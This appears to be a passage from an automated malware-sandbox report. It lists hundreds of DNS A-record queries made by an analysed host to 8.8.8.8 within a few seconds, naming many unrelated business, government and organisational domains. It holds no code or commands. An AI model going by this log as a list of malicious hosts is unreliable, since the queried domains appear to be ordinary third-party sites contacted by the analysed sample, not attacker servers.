                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.376877069 CET192.168.2.68.8.8.80xdeeaStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.376981020 CET192.168.2.68.8.8.80xbeb1Standard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.378351927 CET192.168.2.68.8.8.80xa652Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.410372972 CET192.168.2.68.8.8.80xb1e8Standard query (0)89gospel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.472654104 CET192.168.2.68.8.8.80x1bd6Standard query (0)ludea.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.720005035 CET192.168.2.68.8.8.80x6c1bStandard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.740108013 CET192.168.2.68.8.8.80x70a8Standard query (0)mackusick.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.740983009 CET192.168.2.68.8.8.80xe2b1Standard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.759710073 CET192.168.2.68.8.8.80x8928Standard query (0)valselit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.917800903 CET192.168.2.68.8.8.80xe4d2Standard query (0)biosolve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.920804024 CET192.168.2.68.8.8.80xe4cfStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.928206921 CET192.168.2.68.8.8.80x7accStandard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.933480978 CET192.168.2.68.8.8.80x7b0dStandard query (0)bount.com.twA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.955741882 CET192.168.2.68.8.8.80xef59Standard query (0)e-kami.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.966185093 CET192.168.2.68.8.8.80xde43Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:55.969227076 CET192.168.2.68.8.8.80x27e7Standard query (0)mail7.digitalwaves.co.nzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.057924986 CET192.168.2.68.8.8.80x5d1bStandard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.086430073 CET192.168.2.68.8.8.80x6113Standard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.128983974 CET192.168.2.68.8.8.80x18abStandard query (0)mjrcpas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.158737898 CET192.168.2.68.8.8.80xb6beStandard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.158859015 CET192.168.2.68.8.8.80x9069Standard query (0)fundeo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.240686893 CET192.168.2.68.8.8.80xcf55Standard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.255177021 CET192.168.2.68.8.8.80xfd2eStandard query (0)onzcda.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.292790890 CET192.168.2.68.8.8.80x1f78Standard query (0)orbitgas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.304554939 CET192.168.2.68.8.8.80x75deStandard query (0)dzm.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.326625109 CET192.168.2.68.8.8.80x3aa0Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.354804993 CET192.168.2.68.8.8.80xdbafStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.357558012 CET192.168.2.68.8.8.80x8b30Standard query (0)skgm.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.559443951 CET192.168.2.68.8.8.80x9409Standard query (0)isom.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.623317957 CET192.168.2.68.8.8.80xaf0eStandard query (0)plaske.uaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.648905039 CET192.168.2.68.8.8.80xf8f0Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.677522898 CET192.168.2.68.8.8.80xd1e3Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.715912104 CET192.168.2.68.8.8.80x525dStandard query (0)techtrans.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.726201057 CET192.168.2.68.8.8.80xc13Standard query (0)nblewis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:56.837572098 CET192.168.2.68.8.8.80x8290Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.111243963 CET192.168.2.68.8.8.80xe4cfStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.143410921 CET192.168.2.68.8.8.80x361Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.151829004 CET192.168.2.68.8.8.80x2e58Standard query (0)cqdgroup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.155081987 CET192.168.2.68.8.8.80x83eStandard query (0)icd-host.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.163507938 CET192.168.2.68.8.8.80x4aafStandard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.184385061 CET192.168.2.68.8.8.80xf3c3Standard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.228209019 CET192.168.2.68.8.8.80x6f24Standard query (0)arowines.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.234047890 CET192.168.2.68.8.8.80xbd79Standard query (0)keio-web.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.240773916 CET192.168.2.68.8.8.80xa0b6Standard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.319766045 CET192.168.2.68.8.8.80xcbbdStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.432586908 CET192.168.2.68.8.8.80xb98aStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.454571009 CET192.168.2.68.8.8.80x5835Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.471813917 CET192.168.2.68.8.8.80x3ea8Standard query (0)geecl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.554199934 CET192.168.2.68.8.8.80xa70dStandard query (0)multip.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.572108030 CET192.168.2.68.8.8.80xcd9eStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.719876051 CET192.168.2.68.8.8.80xefeStandard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.727264881 CET192.168.2.68.8.8.80xd436Standard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.731584072 CET192.168.2.68.8.8.80x9940Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.815201998 CET192.168.2.68.8.8.80xb92cStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.897789001 CET192.168.2.68.8.8.80x258dStandard query (0)impexnc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.903621912 CET192.168.2.68.8.8.80xfb16Standard query (0)avse.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.904289007 CET192.168.2.68.8.8.80x573cStandard query (0)lpver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.950191021 CET192.168.2.68.8.8.80x8290Standard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:57.989151955 CET192.168.2.68.8.8.80xb1a8Standard query (0)amerifor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.016760111 CET192.168.2.68.8.8.80x77eeStandard query (0)canmore.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.020436049 CET192.168.2.68.8.8.80x8806Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.022397041 CET192.168.2.68.8.8.80xe714Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.022542953 CET192.168.2.68.8.8.80x311cStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.060055017 CET192.168.2.68.8.8.80x273eStandard query (0)cvswl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.139178991 CET192.168.2.68.8.8.80x665aStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.144871950 CET192.168.2.68.8.8.80x579cStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.216636896 CET192.168.2.68.8.8.80xeb1Standard query (0)bggs.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.219845057 CET192.168.2.68.8.8.80x6a70Standard query (0)vivastay.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.342619896 CET192.168.2.68.8.8.80x83b5Standard query (0)hazmatt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.387326956 CET192.168.2.68.8.8.80xc1a7Standard query (0)vdoherty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.388945103 CET192.168.2.68.8.8.80xd08dStandard query (0)atbauk.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.450716972 CET192.168.2.68.8.8.80x7631Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.455267906 CET192.168.2.68.8.8.80xa12eStandard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.455992937 CET192.168.2.68.8.8.80xcc4Standard query (0)ssm.chA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.493992090 CET192.168.2.68.8.8.80x69fcStandard query (0)atis-sk.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.507462978 CET192.168.2.68.8.8.80xe4cfStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.524960995 CET192.168.2.68.8.8.80x93fcStandard query (0)bd-style.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.532234907 CET192.168.2.68.8.8.80xf661Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.536391973 CET192.168.2.68.8.8.80x963Standard query (0)a-domani.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.568316936 CET192.168.2.68.8.8.80x8e3eStandard query (0)from30ty.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.634398937 CET192.168.2.68.8.8.80x3868Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.662097931 CET192.168.2.68.8.8.80x6034Standard query (0)wvs-net.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.703545094 CET192.168.2.68.8.8.80xc6eaStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.736857891 CET192.168.2.68.8.8.80x9400Standard query (0)rappich.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.738173008 CET192.168.2.68.8.8.80x668dStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.748023987 CET192.168.2.68.8.8.80xbe03Standard query (0)kamptal.atA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.750849962 CET192.168.2.68.8.8.80xe3cbStandard query (0)tabbles.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.810868025 CET192.168.2.68.8.8.80xe94bStandard query (0)cbaben.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.826993942 CET192.168.2.68.8.8.80x7620Standard query (0)yhsll.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.853676081 CET192.168.2.68.8.8.80xe23dStandard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.857285023 CET192.168.2.68.8.8.80xfc19Standard query (0)wnit.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.898329973 CET192.168.2.68.8.8.80x366aStandard query (0)revoldia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.958625078 CET192.168.2.68.8.8.80x64adStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.986901045 CET192.168.2.68.8.8.80xc189Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.991460085 CET192.168.2.68.8.8.80x19deStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:58.995327950 CET192.168.2.68.8.8.80xa73fStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.038857937 CET192.168.2.68.8.8.80xf46eStandard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.042244911 CET192.168.2.68.8.8.80xf2f4Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.042581081 CET192.168.2.68.8.8.80x7436Standard query (0)akr.co.idA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.043180943 CET192.168.2.68.8.8.80x8cb7Standard query (0)cjborden.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.069952011 CET192.168.2.68.8.8.80x1cefStandard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.158286095 CET192.168.2.68.8.8.80x76baStandard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.181798935 CET192.168.2.68.8.8.80x31bfStandard query (0)ruzee.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.189255953 CET192.168.2.68.8.8.80xed60Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.199390888 CET192.168.2.68.8.8.80x8561Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.203166962 CET192.168.2.68.8.8.80x1932Standard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.203577042 CET192.168.2.68.8.8.80xba44Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.247004986 CET192.168.2.68.8.8.80x9f3dStandard query (0)epc.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.357074976 CET192.168.2.68.8.8.80x46b5Standard query (0)johnlyon.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.391832113 CET192.168.2.68.8.8.80xd694Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.479072094 CET192.168.2.68.8.8.80xb46bStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.480290890 CET192.168.2.68.8.8.80xa48dStandard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.482502937 CET192.168.2.68.8.8.80x240Standard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.506187916 CET192.168.2.68.8.8.80x130aStandard query (0)wahw.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.506386995 CET192.168.2.68.8.8.80xe3d5Standard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.516060114 CET192.168.2.68.8.8.80x94Standard query (0)106west.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.555330038 CET192.168.2.68.8.8.80x47f9Standard query (0)shanks.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.558557987 CET192.168.2.6198.32.64.120x8dStandard query (0)deNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.655603886 CET192.168.2.68.8.8.80xb68dStandard query (0)magicomm.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.655905962 CET192.168.2.68.8.8.80x9cf3Standard query (0)shesfit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.680978060 CET192.168.2.68.8.8.80xa986Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.682173014 CET192.168.2.68.8.8.80x55c4Standard query (0)karila.frA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.696378946 CET192.168.2.68.8.8.80xc830Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.701155901 CET192.168.2.68.8.8.80x341cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.732352018 CET192.168.2.68.8.8.80x9a5fStandard query (0)xult.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.743467093 CET192.168.2.68.8.8.80xe0d3Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.745260954 CET192.168.2.68.8.8.80x4c94Standard query (0)hyab.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.846023083 CET192.168.2.68.8.8.80x2504Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:59.959697962 CET192.168.2.68.8.8.80xed7dStandard query (0)dhh.la.govA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.010940075 CET192.168.2.68.8.8.80xc378Standard query (0)t-trust.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.012968063 CET192.168.2.68.8.8.80x1eacStandard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.054560900 CET192.168.2.68.8.8.80x7b6eStandard query (0)pleszew.policja.gov.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.244002104 CET192.168.2.68.8.8.80xfbeaStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.310719967 CET192.168.2.68.8.8.80xfaf8Standard query (0)any-s.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.341955900 CET192.168.2.68.8.8.80x1d9fStandard query (0)kursavto.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.352253914 CET192.168.2.68.8.8.80x671dStandard query (0)slower.itA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.355549097 CET192.168.2.68.8.8.80xb87cStandard query (0)orlyhotel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.439028978 CET192.168.2.68.8.8.80xf2d4Standard query (0)indonesiamedia.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.476429939 CET192.168.2.68.8.8.80xf4b3Standard query (0)nt-hat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.477042913 CET192.168.2.68.8.8.80x3e02Standard query (0)sinwal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.511142015 CET192.168.2.68.8.8.80x650dStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.525851011 CET192.168.2.68.8.8.80x8335Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.526005983 CET192.168.2.68.8.8.80xf05eStandard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.527965069 CET192.168.2.68.8.8.80xfebdStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.620481014 CET192.168.2.68.8.8.80x9a6bStandard query (0)xinhui.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.622302055 CET192.168.2.68.8.8.80x9a39Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.638406038 CET192.168.2.68.8.8.80xf2e0Standard query (0)web-york.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.658956051 CET192.168.2.68.8.8.80xbdb6Standard query (0)yasuma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.662746906 CET192.168.2.68.8.8.80x5031Standard query (0)popbook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.665230036 CET192.168.2.6198.32.64.120x21Standard query (0)comNS (Name server)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.684298038 CET192.168.2.68.8.8.80x5641Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.695641994 CET192.168.2.68.8.8.80x39feStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.703072071 CET192.168.2.68.8.8.80x52f8Standard query (0)dataform.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.771131039 CET192.168.2.68.8.8.80xc560Standard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.780662060 CET192.168.2.68.8.8.80xc26dStandard query (0)mikihan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.804934978 CET192.168.2.68.8.8.80xb7d1Standard query (0)webavant.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.806453943 CET192.168.2.68.8.8.80x2b5cStandard query (0)sigtoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.808773041 CET192.168.2.68.8.8.80xf5aeStandard query (0)shittas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.809709072 CET192.168.2.68.8.8.80xfbc4Standard query (0)invictus.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.823642969 CET192.168.2.68.8.8.80xe4cfStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.824764013 CET192.168.2.68.8.8.80x341cStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.824963093 CET192.168.2.68.8.8.80xa986Standard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.842384100 CET192.168.2.68.8.8.80x1ee5Standard query (0)ramkome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.851604939 CET192.168.2.68.8.8.80x926eStandard query (0)nts-web.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.856719971 CET192.168.2.68.8.8.80x941eStandard query (0)nolaoig.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.857882977 CET192.168.2.68.8.8.80x834aStandard query (0)dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.858086109 CET192.168.2.68.8.8.80x261dStandard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.862483025 CET192.168.2.68.8.8.80x841Standard query (0)avc.com.saA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.863159895 CET192.168.2.68.8.8.80xcef1Standard query (0)pellys.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.939130068 CET192.168.2.68.8.8.80x44f5Standard query (0)ftmobile.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.964869976 CET192.168.2.68.8.8.80x6277Standard query (0)averwin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.967359066 CET192.168.2.68.8.8.80x9d2Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.969337940 CET192.168.2.68.8.8.80x38d8Standard query (0)ultibax.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.971765995 CET192.168.2.68.8.8.80xc20fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:00.994118929 CET192.168.2.68.8.8.80x93aStandard query (0)dyag-eng.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:56:01.084270954 CET192.168.2.68.8.8.80xa795Standard query (0)anduran.comA (IP address)IN (0x0001)false
